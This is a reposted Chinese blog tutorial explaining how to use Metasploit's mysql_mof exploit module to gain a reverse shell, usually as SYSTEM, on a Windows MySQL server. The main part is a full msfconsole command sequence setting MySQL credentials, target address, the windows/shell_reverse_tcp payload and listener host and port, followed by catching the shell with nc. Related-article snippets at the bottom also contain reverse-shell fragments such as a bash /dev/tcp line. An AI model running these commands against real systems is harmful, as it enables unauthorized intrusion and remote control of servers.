mysql mof+metasploit反弹shell

2024-04-02 19:04:59 576人浏览泡泡鱼

摘要

鉴于上篇文章 Http://z2ppp.blog.51cto.com/11186185/1975985 Mysql mof提权metasploit已经有针对该方式的利用代码，原理还是一样

鉴于上篇文章 Http://z2ppp.blog.51cto.com/11186185/1975985 Mysql mof提权

metasploit已经有针对该方式的利用代码，原理还是一样生成mof文件，只是metasploit中可以使用到反弹技术，就不用额外添加用户，前提是对方服务器允许访问公网

use exploit/windows/mysql/mysql_mof
set passWord xxx    //设置登录mysql的密码
set username xxx    //设置登录mysql的用户
set rhost xxx       //设置要登录的ip地址
set rport xxxx      //设置mysql的端口号
set payload windows/shell_reverse_tcp    //所使用的反弹模块
set lhost xxx       //反弹到的ip地址
set lport xxx       //反弹到的端口
show options        //设置完成后，使用该命令可查看设置参数情况
exploit             //执行

mysql mof+metasploit反弹shell

如没问题，即exploit执行

这边我们使用nc监听对应端口号，就可以接收到shell了，通常情况为system权限，因为mof文件是由system执行

mysql mof+metasploit反弹shell

错误之处，敬请指正

您可能感兴趣的文档:

点击免费下载>>软考高级考试备考技巧/历年真题/备考精华资料

--结束END--

本文标题: mysql mof+metasploit反弹shell

本文链接: https://www.lsjlt.com/news/38572.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

本篇文章演示代码以及资料文档资料下载

下载Word文档到电脑，方便收藏和打印～

下载Word文档

去做题

猜你喜欢

反弹shell脚本（php-reverse-shell）

平时经常打靶机这里贴一个反弹shell的脚本 array("pipe", "r"), // stdin is a pipe that the child will read from 1 ...

99+

2023-10-12

php 反弹shell
NC如何反弹shell

这篇文章给大家分享的是有关NC如何反弹shell的内容。小编觉得挺实用的，因此分享给大家做个参考，一起跟随小编过来看看吧。假如ubuntu、CentOS为目标服务器系统kali为攻击者的系统，ip为：192.168.0.4，开放7777端口...

99+

2023-06-09
Python3实现——反弹shell

一、演示一下反弹shell的效果0、看一下python版本1、我们这边是服务端客户端连接后就可以输入命令了，比如下面截图中输入的pwd2、目标机是客户端，输入ip和端口二、代码+注释0、服务端1、客户端...

99+

2023-01-31

shell
反弹shell的姿势有哪些

这篇文章主要介绍反弹shell的姿势有哪些，文中介绍的非常详细，具有一定的参考价值，感兴趣的小伙伴们一定要看完！Linux 反弹shell姿势一：bash反弹bash -i >& /dev/tcp...

99+

2023-06-20
Linux的反弹shell命令的解析

这篇文章主要介绍“Linux的反弹shell命令的解析”，在日常操作中，相信很多人在Linux的反弹shell命令的解析问题上存在疑惑，小编查阅了各式资料，整理出简单好用的操作方法，希望对大家解答”Linux的反弹shell命令的解析”的疑...

99+

2023-06-16
Linux之bash反弹shell原理是什么

这篇文章将为大家详细讲解有关Linux之bash反弹shell原理是什么，小编觉得挺实用的，因此分享给大家做个参考，希望大家阅读完这篇文章后可以有所收获。什么是Linux系统Linux是一种免费使用和自由传播的类UNIX操作系统，是一个基于...

99+

2023-06-09
linux中反弹shell的原理是什么

这期内容当中小编将会给大家带来有关linux中反弹shell的原理是什么，文章内容丰富且以专业的角度为大家分析和叙述，阅读完这篇文章希望大家可以有所收获。什么是Linux系统Linux是一种免费使用和自由传播的类UNIX操作系统，是一个基于...

99+

2023-06-09
Tomcat弱口令复现及利用(反弹shell)

目录漏洞描述复现环境攻击流程利用msf利用反弹shell利用参考文章漏洞描述 Tomcat有一个管理后台，其用户名和密码在Tomcat安装目录下的conf\tomcat-users....

99+

2024-04-02
Linux下反弹CmdLine Shell小技巧有哪些

这篇文章主要为大家展示了“Linux下反弹CmdLine Shell小技巧有哪些”，内容简而易懂，条理清晰，希望能够帮助大家解决疑惑，下面让小编带领大家一起研究并学习一下“Linux下反弹CmdLine Shell小技巧有哪些”这篇文章吧。...

99+

2023-06-17
Linux下NC反弹shell命令的使用方法

小编给大家分享一下Linux下NC反弹shell命令的使用方法，相信大部分人都还不怎么了解，因此分享这篇文章给大家参考一下，希望大家阅读完这篇文章后大有收获，下面让我们一起去了解一下吧！什么是Linux系统Linux是一种免费使用和自由传播...

99+

2023-06-09
【甄选靶场】Vulnhub百个项目渗透——项目五十四：jarbas-1（类git反弹shell,计划任务提权）

Vulnhub百个项目渗透 Vulnhub百个项目渗透——项目五十四：jarbas-1（类git反弹shell,计划任务提权） 🔥系列专栏：Vulnhub百个项目渗透 Ἰ...

99+

2023-08-31

git php 服务器渗透测试系统安全